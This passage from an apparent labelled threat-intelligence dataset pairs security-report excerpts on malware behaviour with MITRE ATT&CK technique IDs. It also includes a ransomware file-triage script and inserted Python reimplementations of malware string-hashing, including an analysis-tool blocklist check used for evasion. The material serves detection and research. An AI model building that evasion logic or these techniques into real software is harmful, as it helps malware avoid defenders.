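    """WNCRYT marks a file WannaCry staged but has not yet renamed to WNCRY."""
    return os.path.splitext(name)[1].lower() == ".wncryt"


def triage(files: Dict[str, bytes]) -> Dict[str, str]:
    """Classify a {name: content} mapping; return only the hits."""
    hits = {}
    for name, data in files.items():
        family = classify_encrypted_file(name, data)
        if family:
            hits[name] = family
    return hits


# Constructed samples (not real encrypted files)
SAMPLES = {
    "report.docx.WNCRY": WANACRY_MAGIC + b"\x00" * 32,
    "budget.xlsx.WNCRYT": b"\x00" * 16,                   # staging extension only
    "notes.txt": b"\x11\x22" * 8 + FIVEHANDS_TRAILER,     # trailer only
    "readme.txt": b"plain text",
}

if __name__ == "__main__":
    for name, family in triage(SAMPLES).items():
        staged = " (staged)" if is_staged_wannacry(name) else ""
        print(f"{name}: {family}{staged}")
```

The trailer check alone is a weak signal on small files, so in practice pair it with the file-size and entropy checks your triage already does; the header and extension checks for WannaCry are strong on their own.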
|
|
{"text1":"The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control (C&C) location. The Seedworm group is the only group known to use the Powermud backdoor","labels":"['T1090.002']"}
|
|
{"text1":"While we do not have data supporting targeting information or telemetry, we know the document was created in January 2018 and likely used in an attack around that time frame. The QUADAGENT payload dropped by the delivery document had the filename AdobeAcrobatLicenseVerify.ps1 and used acrobatverify[.]com for its C2. This IP and msoffice-cdn[.]com were both previously referenced in our first report on an OilRig attack using the ThreeDollars delivery document. We used this QUADAGENT payload when testing the Invoke-Obfuscation tool mentioned in this blog. QUADAGENT Analysis The final payload delivered in all three attack waves is a PowerShell downloader referred to by other research organizations as QUADAGENT. The downloaders in these attacks were configured to use both rdppath[.]com and cpuproc[.]com as their C2 servers. When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order. For instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request. Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications. We provide more on the specific usage of these protocols as we discuss the inner workings of this malware in this section","labels":"['T1008']"}
|
|
{"text1":"By performing two-factor authentication interception by receiving the OTP on their own telephone number, they gained access to the company network via the VPN. Our hypothesis is that they tested the 2FA system first or selected the primary phone number to send an SMS to. Thus the 2FA code was sent with supporting Chinese text","labels":"['T1111']"}
|
|
{"text1":"The script will then proceed to download a tar compressed archive\u00a0from a\u00a0download server according to the architecture of the compromised system","labels":"['T1105']"}
|
|
{"text1":"In their advisory published on Jan. 26, 2022, CERT-UA asserted that the initial vector for the malware, dubbed WhisperGate, was either a supply-chain attack or exploitation. The first payload in this infection is responsible for the initial attempt at wiping the systems. The malware executable wipes the master boot record (MBR) and replaces it with the code responsible for displaying the ransom note. Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten and has no recovery options. This wiper also tries to destroy the C:\\ partition by overwriting it with fixed data. The additional steps taken to wipe the actual hard drive partition differentiate its behavior from other wiper malware like NotPetya. However, most modern systems today have switched to GUID Partition Table (GPT) from MBR, which allows for larger file systems and has fewer limitations, potentially limiting some of the impacts of this executable","labels":"['T1542.003']"}
|
|
{"text1":"Process name, service name, and driver path listings are obtained, and each value is hashed via the FNV-1a + XOR algorithm as described previously and checked against hardcoded blocklists. Some of these hashes have been brute force reversed as part of this analysis, showing that these routines are scanning for analysis tools and antivirus engine components. If a blocklisted process is found the Update routine exits and the sample will continue to try executing the routine until the blocklist passes. Some entries in the service list if found on the system may affect the DGA algorithms behavior in terms of the values generated. The list of stopped services is then bit-packed into the ReportWatcherPostpone key of the appSettings entry for the samples\u2019 config file. The sample retrieves a driver listing via the WMI query Select * From Win32_SystemDriver","labels":"['T1057']"}
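The hashing and blocklist check described above, reproduced as an added example for this corpus (not the sample's own code): FNV-1a over each name followed by an XOR with a fixed constant, a blocklist lookup over a process listing, and the wordlist brute force that the analysts used to recover names from hashes. The XOR constant is the value publicly reported for this sample and is treated as an assumption; the lowercase-and-strip-.exe normalisation, the blocklist entries and the process listing are constructed for the example.

```python
"""FNV-1a + XOR name hashing with a blocklist check and hash reversal.

Added example for this corpus, not the malware's own code. XOR_TWEAK is
assumed (publicly reported value); the normalisation rule, ANALYST_TOOLS
and SAMPLE_LISTING are constructed for illustration.
"""
from typing import Dict, Iterable, List, Set

FNV64_OFFSET = 0xCBF29CE484222325
FNV64_PRIME = 0x100000001B3
MASK64 = (1 << 64) - 1
XOR_TWEAK = 0x5BAC903BA7D81EC6  # assumed post-hash XOR constant


def fnv1a_64(data: bytes) -> int:
    """Plain 64-bit FNV-1a: XOR the byte in, then multiply by the prime."""
    h = FNV64_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV64_PRIME) & MASK64
    return h


def normalise(name: str) -> str:
    """Assumed normalisation: lowercase and drop a trailing '.exe'."""
    n = name.lower()
    return n[:-4] if n.endswith(".exe") else n


def name_hash(name: str) -> int:
    """Hash a process/service/driver name: FNV-1a, then XOR with the constant."""
    return fnv1a_64(normalise(name).encode("utf-8")) ^ XOR_TWEAK


def blocklisted_names(listing: Iterable[str], blocklist: Set[int]) -> List[str]:
    """Entries of `listing` whose hash appears in `blocklist` (the sample's
    'do not run while an analysis tool is present' check)."""
    return [n for n in listing if name_hash(n) in blocklist]


def brute_force_hashes(unknown: Set[int], wordlist: Iterable[str]) -> Dict[int, str]:
    """The reversal step: hash every candidate word and keep the matches."""
    table = {name_hash(w): w for w in wordlist}
    return {h: table[h] for h in unknown if h in table}


# Constructed blocklist of analyst tool names (not the sample's real list)
ANALYST_TOOLS = ["windbg", "procmon", "wireshark", "x64dbg"]
BLOCKLIST = {name_hash(t) for t in ANALYST_TOOLS}
SAMPLE_LISTING = ["svchost.exe", "explorer.exe", "Procmon.exe", "notepad.exe"]

if __name__ == "__main__":
    print("blocked by:", blocklisted_names(SAMPLE_LISTING, BLOCKLIST))
    print("recovered:", brute_force_hashes(BLOCKLIST, ["explorer", "windbg", "procmon.exe"]))
```

With the real hash list from a sample, `brute_force_hashes` over a few thousand known tool, driver and service names recovers most entries in seconds; the survivors are the ones worth a targeted wordlist.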
|
|
{"text1":"Note that the actor used the DLL name wercplsupporte.dll as an attempt to masquerade as the legitimate DLL name, which is wercplsupport.dll (T1036.005: Match Legitimate Name or Location). In addition, more masquerading was used to make malicious Scheduled Tasks blend in with legitimate ones (T1053.005: Scheduled Task","labels":"['T1036.005']"}
|
|
{"text1":"All this data is merged in one file xmlrwbin.inc, which is then encrypted with RC4. To be able to decipher the data, the attacker should certainly know either the MD5 hash or the whole buffer content. This data is also sent, but RSA encrypted. The malware constructs a 1120 bit public key, uses it to encrypt the 117-byte buffer. The malware then concatenates all the data to be sent as a 128-byte block. The resulting data is saved in C:\\Program Files\\Common Files\\System\\Ole DB to a file named according to the following format","labels":"['T1070.004']"}
|
|
{"text1":"The file reflectively injects a ransomware DLL into the memory of the legitimate running process explorer.exe","labels":"['T1055.001']"}
|
|
{"text1":"They renamed their files to make them look like legitimate files, for example, KB77846376.exe, named after Microsoft update files. They routinely used standard tools that would mimic legitimate administrator activities. When planting webshells on the Outlook Exchange servers, they modified already existing legitimate flogon.js and logoff.aspx files. They relied on encrypted SSH-based tunnels to transfer tools and for remote command\/program execution. They used multiple staging folders and opted to use directories that were used infrequently by legitimate users or processes. They routinely deleted dropped attack tools, execution logs, files staged for exfiltration, and other files after they were finished with them. They renamed their tools' filenames in the staging folder so that it would not be possible to identify the malware's purpose, even after it was deleted from the disk through the residual artifacts (e.g. ShimCache entries or WMI Recently Used Apps). - They used timestomping to modify the $STANDARD_INFORMATION attribute of the attack tools","labels":"['T1070.004']"}
|
|
{"text1":"Limited obfuscation was encountered, where the authors split up strings into smaller sub-strings and used \u2018strcpy\u2019 and \u2018strcat\u2019 calls to re-build them prior to use. They also used this same technique to generate garbage strings that are never used. Comments have been added to show the fully-generated strings","labels":"['T1027']"}
|
|
{"text1":"We also noticed that the\u00a0actors reused the\u00a0VBS decode function\u00a0published by\u00a0Motobit. Figure 4 shows the comparison between the\u00a0base64\u00a0function used in the macro code and the VBS\u00a0base64\u00a0decoder function published by\u00a0Motobit","labels":"['T1059.005']"}
|
|
{"text1":"Windows AppLocker allows administrators to control which executable files are denied or authorized to execute. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. A number of legitimate Windows executables that are not blocked by the default AppLocker policies have been discovered and various proof of concept AppLocker bypass code became publicly available. Example of malicious scriptlet file used to drop a malicious DLL dropper for the next stage Microsoft allows developers to create COM+ objects in script code stored in an XML document, a so-called scriptlet file. To bypass AppLocker and launch script code within a scriptlet, the attacker includes the malicious code within an XML script tag placed within the registration tag of the scriptlet file and calls cmstp with appropriate parameters. For example: Here, the attackers randomize the scriptlet name and use a .txt filename extension, likely in an attempt to bypass fundamental protection mechanisms that attempt to block file types based on the filename extension. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. It takes an XML and an XSL file as a parameter, but it also loads the script engine and runs the script code within the <msxsl:script> tag of the supplied XSL file when invoked through a call placed within the <xsl:value-of> tag. Invoking the JScript code of the payload dropper within an XSL file The supplied XML file seems to be randomly generated and used simply because the second parameter is required and is of no further interest for analysis","labels":"['T1220']"}
|
|
{"text1":"Inception is continuing to use chains of infected routers to act as proxies and mask communications between the attackers and the cloud service providers they use. Certain router manufacturers have UPnP listening on WAN as a default configuration. These routers are hijacked by Inception and configured to forward traffic from one port to another host on the internet. Abuse of this service requires no custom malware to be injected on the routers and can be used at scale very easily. Inception strings chains of these routers together to create multiple proxies to hide behind","labels":"['T1090.003']"}
|
|
{"text1":"The classic Shlayer technique is clearly evident here: passing encrypted and password-protected code to openssl and then writing that out as a payload to the \/tmp folder","labels":"['T1140']"}
|
|
{"text1":"While both malware families are designed to deploy Cobalt Strike Beacon, there are differences in Cobalt Strike configuration. To date, Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was configured to use HTTPS as a communication protocol. In the fourth it was configured to use SMB Named Pipe as a communication protocol","labels":"['T1090.001']"}
|
|
{"text1":"Nonetheless, the infected DLL contains just one method (named DynamicRun), that can receive a C# script from a web request, compile it on the fly, and execute it","labels":"['T1059.001']"}
|
|
{"text1":"There are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe options in Outlook. The following setting can be used to re-enable the original home page tab and roaming home page behavior in the Outlook UI","labels":"['T1137.004']"}
|
|
{"text1":"In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hashing algorithm generates a CRC32 hash of the string, converted to lowercase. This hash is combined with a DWORD using a simple XOR. This string hashing algorithm is identical to the hashing algorithm used in other Dridex modules. The hash algorithm has been replicated in Python below","labels":"['T1027']"}
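The record says the hash algorithm was replicated in Python, but that code is not on this page. The following is an added example for this corpus, not the report's replication or the malware's code: CRC32 of the lowercased string XORed with a DWORD, plus the resolution step that matches the stored hashes against strings present on the host. XOR_KEY is a hypothetical placeholder (the real DWORD is sample-specific), and the host strings and target set are constructed.

```python
"""BitPaymer-style string hashing (CRC32 of the lowercased string, XOR DWORD)
and hash-to-string resolution.

Added example for this corpus, not code from BitPaymer, Dridex or the
original report. XOR_KEY, HOST_STRINGS and WANTED are constructed.
"""
import zlib
from typing import Dict, Iterable, Set

XOR_KEY = 0x11223344  # hypothetical per-build DWORD, not a recovered value


def bitpaymer_style_hash(s: str, xor_key: int = XOR_KEY) -> int:
    """CRC32 over the lowercased string, then XOR with a 32-bit constant."""
    crc = zlib.crc32(s.lower().encode("utf-8")) & 0xFFFFFFFF
    return (crc ^ xor_key) & 0xFFFFFFFF


def resolve_hashes(wanted: Set[int], candidates: Iterable[str],
                   xor_key: int = XOR_KEY) -> Dict[int, str]:
    """Map each wanted hash to the candidate string that produces it.

    This is the same operation the malware performs at runtime (hash what is
    on the host, keep the matches) and the one an analyst performs offline
    with an API/file-name wordlist to recover the original strings."""
    resolved = {}
    for name in candidates:
        h = bitpaymer_style_hash(name, xor_key)
        if h in wanted:
            resolved[h] = name
    return resolved


# Constructed host listing (mixed case, as found on disk) and constructed
# target set standing in for the hashes embedded in a binary.
HOST_STRINGS = ["kernel32.dll", "NTDLL.DLL", "ADVAPI32.dll", "user32.dll", "vssadmin.exe"]
WANTED = {bitpaymer_style_hash("ntdll.dll"), bitpaymer_style_hash("vssadmin.exe")}

if __name__ == "__main__":
    for h, name in resolve_hashes(WANTED, HOST_STRINGS).items():
        print(f"{h:08x} -> {name}")
```

Because the XOR is applied after the CRC, recovering the DWORD from a known pair is a single XOR: hash a string you can confirm the sample references and XOR the result with the embedded value; every other hash in the table then falls to the same wordlist.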
|
|
{"text1":"Targets are approached with spearphishing emails that contain a link to a ZIP file hosted on Google Drive. That archive contains several LNK (aka shortcut) files that extract and execute a malicious JavaScript component, while displaying a decoy document","labels":"['T1204.001', 'T1566.002']"}
|
|
{"text1":"Throughout our research, we witnessed several different infection chains being used to deliver the Aria-body backdoor. This RTF file, which was infected (weaponized) with the RoyalRoad exploit builder, drops a loader named intel.wll into the target PC\u2019s Word startup folder. The loader in turn tries to download and execute the next stage payload from spool.jtjewifyn[.]com","labels":"['T1137.006']"}
|
|
{"text1":"When running on Windows 7, the malicious library uses the Metasploit Framework\u2019s open-source code Win7Elevate to inject malicious code into explorer.exe","labels":"['T1055']"}
|
|
{"text1":"Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros. When the file is opened, it loads in Microsoft Excel and urges the user to enable macros","labels":"['T1204.002']"}
|
|
{"text1":"RTF documents sent in the observed campaigns contain exploits for several vulnerabilities in Microsoft Office, and they seem to be created using a version of an exploit toolkit, often referred to as Threadkit. Threadkit is not exclusively used by the actors behind the observed attacks but also by other groups utilizing various payloads, including Trickbot, Lokibot, SmokeLoader and some other banking malware. The embedded object triggers a download of an HTML page containing the VBScript that exploits the vulnerability and launches the shellcode. The HTML component of the exploit is based on the original exploit code discovered in May this year. CVE-2018-8174 VB script exploit code","labels":"['T1203']"}
|
|
{"text1":"BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities","labels":"['T1082']"}
|
|
{"text1":"Upon execution, the Micropsia malware takes screenshots every 90 seconds by calling to Gdi32.BitBlt API. Screenshots are saved as unencrypted files in JPEG format with a specific file name that contains the current timestamp (yyyy-mm-dd hh-nn-ss) with the hardcoded extension .his","labels":"['T1113']"}
|
|
{"text1":"Both variants build their API imports dynamically using GetProcAddress, including wtsapi32.dll for gathering user and domain names for any active remote sessions - Both variants contain a variety of functionalities based on command IDs issued by the control servers - Common capabilities of both malware: - Listing files in directory - Creating arbitrary processes - Writing data received from control servers to files on disk - Gathering information for all drives - Gathering process times for all processes - Sending the contents of a specific file to the control server - Wiping and deleting files on disk - Setting the current working directory for the implant - Sending disk space information to the control server - Both variants use a batch file mechanism to delete their binaries from the system - Both variants run commands on the system, log output to a temporary file, and send the contents of the file to their control servers","labels":"['T1082', 'T1057', 'T1083']"}
|
|
{"text1":"Our dynamic analysis showed Lokibot\u2019s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. We conducted dynamic analysis to observe network and system behavior once it infected our Windows OS. We then conducted a static analysis to examine Lokibot\u2019s techniques and targets. The response for this request is a customized 404 page, which can also be detected using Suricata signatures provided on the Malpedia page cited above as well. We also noticed that the value of the sub key is the path to the file that Lokibot created after its initial execution. There are no unusual sections, and the size and distribution of the sections, especially .text, mirrors a standard unpacked binary (Figure 6). File Metadata and Strings: The binary is a PE x86 binary, which can be run on both x86 and 64-bit Windows OS. This is a strong indication that the binary is a .NET library, because mscoree.dll and _CoreExeMain are primarily used to load .NET binaries (Figure 9). Hollow Process; Manually Unpacking the First Stage Binary: We tried to follow the binary with a debugger to determine where it unpacked itself in the memory, but Lokibot used a hollow process technique to obscure some of this activity. Because the malware was loaded into vbc.exe, the process viewer will show it as a legitimate process, making it more difficult for a user to identify","labels":"['T1055.012']"}
{"text1":"In a recent wave of attacks during February 2019, Elfin attempted to exploit a known vulnerability (CVE-2018-20250) in WinRAR, the widely used file archiving and compression utility capable of creating self-extracting archive files. The exploit was used against one target in the chemical sector in Saudi Arabia. If successfully exploited on an unpatched computer, the vulnerability could permit an attacker to install any file on the computer, which effectively permits code execution on the targeted computer","labels":"['T1203']"}
{"text1":"When the decrypt button is clicked without the ransom being paid, the malware decrypts the files listed in f.wnry. The files listed in f.wnry are those randomly selected to be encrypted with the embedded public key","labels":"['T1486']"}
{"text1":"The backdoor appears to support network communication over ports 80 (HTTP) and 443(HTTPS). In recent samples, a certificate is issued from the infected host for communication over HTTPS","labels":"['T1071.001']"}
{"text1":"Close analysis of the delivered payloads and legitimate resources retrieved from URLs by the first stage malware dropper reveals that TA416 is once again using an updated version of PlugX malware to target their victims. Historically, the group has relied on a variety of legitimate antivirus files, including the Avast file resource wsc_proxy.exe, to begin the process of DLL search order hijacking that results in PlugX malware installation. In the January 2022 campaigns, TA416 used the PE file potplayermini.exe to initiate DLL search order hijacking. This is a legitimate executable file that is part of the publicly available media player Daum PotPlayer 1.5.29825, which Mandiant has previously\u00a0documented\u00a0as being susceptible to search order hijacking since at least 2016. The file DocConvDll.dll has also intermittently been used as a loader of the PlugX DAT configuration files. For those that are familiar with TA416\u2019s historic tactics, techniques, and procedures (TTPs), this is highly similar to the Trident Loader method which the group used to install PlugX in previous campaigns","labels":"['T1574.001']"}
{"text1":"Password from successful login to the infected server: Whenever someone logs in a system infected with Linux\/Ebury, the\u00a0sshd\u00a0daemon will save the password and send it to the exfiltration server. Password on successful login from the infected server: When someone uses the\u00a0ssh\u00a0client on an infected server, Linux\/Ebury will intercept the password and sent it to its exfiltration server. Private key passphrase: When the\u00a0ssh\u00a0client on an infected server prompts the user for an private key passphrase, the passphrase will be sent to the remote exfiltration server. Unencrypted private key: When a private key is used to authenticate to a remote server, the unencrypted version is intercepted by the malware. Unlike passwords, it will not send the key to the exfiltration server. Instead, it will store it memory and wait for the operators to fetch the key with the\u00a0Xcat\u00a0command. Private keys added to the OpenSSH agent with\u00a0ssh-add: The keys added to an OpenSSH agent are also intercepted by the malware. Both the unencrypted key itself and the passphrase typed by the user will be logged","labels":"['T1552.004']"}
{"text1":"Details: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe. Writing an analytic looking for a process of esentutl.exe with Windows\\WebCache in the command line may help you catch this behavior","labels":"['T1005']"}
{"text1":"Executes VBScript using Process.Start. Next, the DLL loads an embedded resource named \"78c855a088924e92a7f60d661c3d1845\" into memory and decrypts it using multiple XOR operations. Loads the resource using Assembly.GetManifestResourceStream. Method that performs the XOR decryption. The decrypted resource is a DLL file embedded with two resources named \"AdvancedRun\" and \"Waqybg\" that are compressed with GZip. Two resources embedded in the decrypted resource. The third-stage DLL proceeds by loading the \"AdvancedRun\" resource into memory, decompressing it and dropping it as \"AdvancedRun.exe\" into the %TEMP% directory. Calling GZipStream class to decompress the resource. Drops AdvancedRun.exe using File.WriteAllBytes. The TrustedInstaller group was an addition to Windows beginning in Windows 7 with the goal of preventing accidental damage to critical system files","labels":"['T1140']"}
{"text1":"When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named \u201cvmtoolsd. Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name \u2018MSASCuiLTasks\u2019 in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence. Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1","labels":"['T1497.001']"}
{"text1":"This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The Cobalt Strike module can use several profiles and switch between data exchange methods on command from the C&C server without the need to update the module. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed","labels":"['T1547.001']"}
{"text1":"Raindrop is compiled as a DLL, which is built from a modified version of 7-Zip source code. The 7-Zip code is not utilized and is designed to hide malicious functionality added by the attackers. The DLL is compiled where the Name file of the Export Directory Table is \u201c\"7-zip.dll\" and the Export Names are","labels":"['T1036']"}
{"text1":"Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of extension has a legitimate jQuery.js included in the extension bundle. Figure 4:\u00a0Given the threat actor\u2019s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. A compromised or stolen certificate was used to sign several PE files used in STOLEN PENCIL for two sets of tools: - MECHANICAL Logs keystrokes to %userprofile%\\appdata\\roaming\\apach. Figure 5: Certificate used to sign MECHANICAL\/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site","labels":"['T1555.003']"}
{"text1":"In both cases, Group5 disguised the malicious binaries with several layers of obfuscation, including crypting and packing to reduce the possibility of detection by antivirus software","labels":"['T1027']"}
{"text1":"The malware also monitors all fixed and removable drives mapped on the local system. Whenever a new drive is inserted, it creates a list of all the files on the drive and stores it encrypted in a file","labels":"['T1119']"}
{"text1":"This extreme level of variance was also applied to non-executable entities, such as WMI persistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Tools and binaries used by the attackers (e.g. ADFIND legit tool) were always renamed and placed in folders that mimicked existing programs and files already present on a machine. This blending was not just used for files, but for other elements. For example, WMI persistence filters were created with names and queries matching other scripts present in affected organizations. Before running intensive and continued hands-on keyboard activity, the attackers took care of disabling event logging using AUDITPOL and re-enabling it afterward. The firewall rules were also methodically removed after the network reconnaissance was completed. Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services. We believe that the attackers used timestomping to change timestamps of artifacts and also leveraged professional wiping procedures and tools to complicate finding and recovering of DLL implants from affected environments","labels":"['T1047']"}
{"text1":"The sample arrives as an app bundled in a Zip archive. It uses the icon for a Word document file as a disguise, attempting to pass itself off as a legitimate document file","labels":"['T1036.004']"}
{"text1":"The majority of 2017 and 2018 Karagany samples analyzed by CTU researchers were packed using a custom packer, albeit a reasonably simple one that performs a number of binary shifts and logic operations. Karagany campaigns in 2016 and prior typically used the UPX packer as an additional layer of obfuscation, but this behavior was not observed in 2017-2018 samples. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis","labels":"['T1027.002']"}
{"text1":"Unlike a Docker engine that runs on a single host, a Kubernetes cluster typically contains more than one host and every host can run multiple containers. Given the abundant resources in a Kubernetes infrastructure, a hijacked Kubernetes cluster can be more profitable than a hijacked Docker host. This new TeamTNT malware campaign is one of the most complicated attacks targeting Kubernetes. This is also the most feature-rich malware we have seen from TeamTNT so far. In particular, the threat actor has developed more sophisticated tactics for initial access, execution, defense evasion and C2. Although the malware is still under development and the campaign is not yet widely spread, we believe the attacker will soon mature the tools and start a large-scale deployment","labels":"['T1133']"}
{"text1":"OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell. The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries","labels":"['T1036.005']"}
{"text1":"The instrumentor script also performs a cleanup of the cookies for Google Chrome and Microsoft Edge browsers. This is done by simply terminating any browser processes running on the system and then deleting the cookie files on disk","labels":"['T1555.003']"}
{"text1":"They renamed their files to make them look like legitimate files, for example, trilog.exe, named after a legitimate Schneider Electric application","labels":"['T1036.005']"}
{"text1":"After a user logs on, a variety of credentials are generated and stored in the\u00a0Local Security Authority Subsystem Service, LSASS, process in memory. While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), this doesn\u2019t prevent the system from generating the LM hash in memory. By default, Windows Server 2008 and Windows Vista no longer generate LM hashes for users unless explicitly enabled. Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and \u201cclear-text\u201d password are no longer in memory. This functionality was also \u201cback-ported\u201d to earlier versions of Windows (Windows 7\/8\/2008R2\/2012) in kb2871997, though in order to prevent the \u201cclear-text\u201d password from being placed in LSASS, the following registry key needs to be set to \u201c0\u201d (Digest Disabled","labels":"['T1098']"}
{"text1":"Much like the known actors Miniduke or CommentCrew, it hides base64 encoded and encrypted control server locations in comments on legitimate web sites. However, unlike the previous actors, the encrypted data provides information about the next hop, or the true C2 for the backdoor, instead of initial commands","labels":"['T1102.001']"}
{"text1":"Lateral movement began around 28 hours after initial entry, using SMB to drop a Cobalt Strike Beacon on a domain controller. From there, the threat actor used WMIC to execute the beacon","labels":"['T1021.002']"}
{"text1":"Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor \u2013 but that's a totally different threat with different functionality. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. Agent.btz file is not packed. Thus, it\u2019s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Posted by Sergei Shevchenko at Labels: Agent.btz Newer Post Older Post Home","labels":"['T1016']"}
{"text1":"Seaduke delivery The attackers control Cozyduke via compromised websites, issuing instructions to infected machines by uploading \u201ctasks\u201d to a database file. Cozyduke will periodically contact these websites to retrieve task information to be executed on the local machine. One such task (an encoded PowerShell script) instructed Cozyduke to download and execute Seaduke from a compromised website","labels":"['T1059.001']"}
{"text1":"After this data has been aggregated, it is uploaded to a hardcoded command and control (C2) server via HTTP. The data is embedded within the \u2018Cookie\u2019 HTTP header, as seen below","labels":"['T1071.001']"}
{"text1":"Persistence: Creates a Windows RUN registry key for persistence. The name of the key is: \"Dropbox Update Setup\". This name was consistent in all the samples. This key points to the location of the Python-compiled binary in the %appdata% directory to ensure that it is started automatically each time the system is\u00a0rebooted","labels":"['T1036.004', 'T1547.001']"}
{"text1":"If you continue browsing the site, you agree to the use of cookies on this website. If you continue browsing the site, you agree to the use of cookies on this website. Home - Explore Submit Search . - Upload - Login - Signup - Upload - Home - Explore - Login - Signup Activate your 30 day free trial\u00a0to unlock unlimited reading. Facebook - Twitter - LinkedIn - Share - Email - - No Easy Breach DerbyCon 2016 . 22 . Share . Download to read offline . Every IR presents unique challenges. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. All rights reserved.24 Our Response: Increased PowerShell Visibility \u2022 Upgraded the environment to PowerShell 3.0 and enabled logging \u2022 Logging captured input\/output, variable initialization, etc. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity \u2022 Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. Unlimited Reading . Learn faster and smarter from top experts . Unlimited Downloading . Download to take your learnings offline and on the go . You also get free access to Scribd","labels":"['T1059.001']"}
{"text1":"The samples install\u00a0HTTPBrowser at %APPDATA%\/wdm.exe. Persistence is established via the HKCUSoftwareMicrosoftWindowsCurrentVersionRun key value for wdm\u00a0set to the path of the executable. Previous samples have set persistence via Run key values for 360v","labels":"['T1547.001']"}
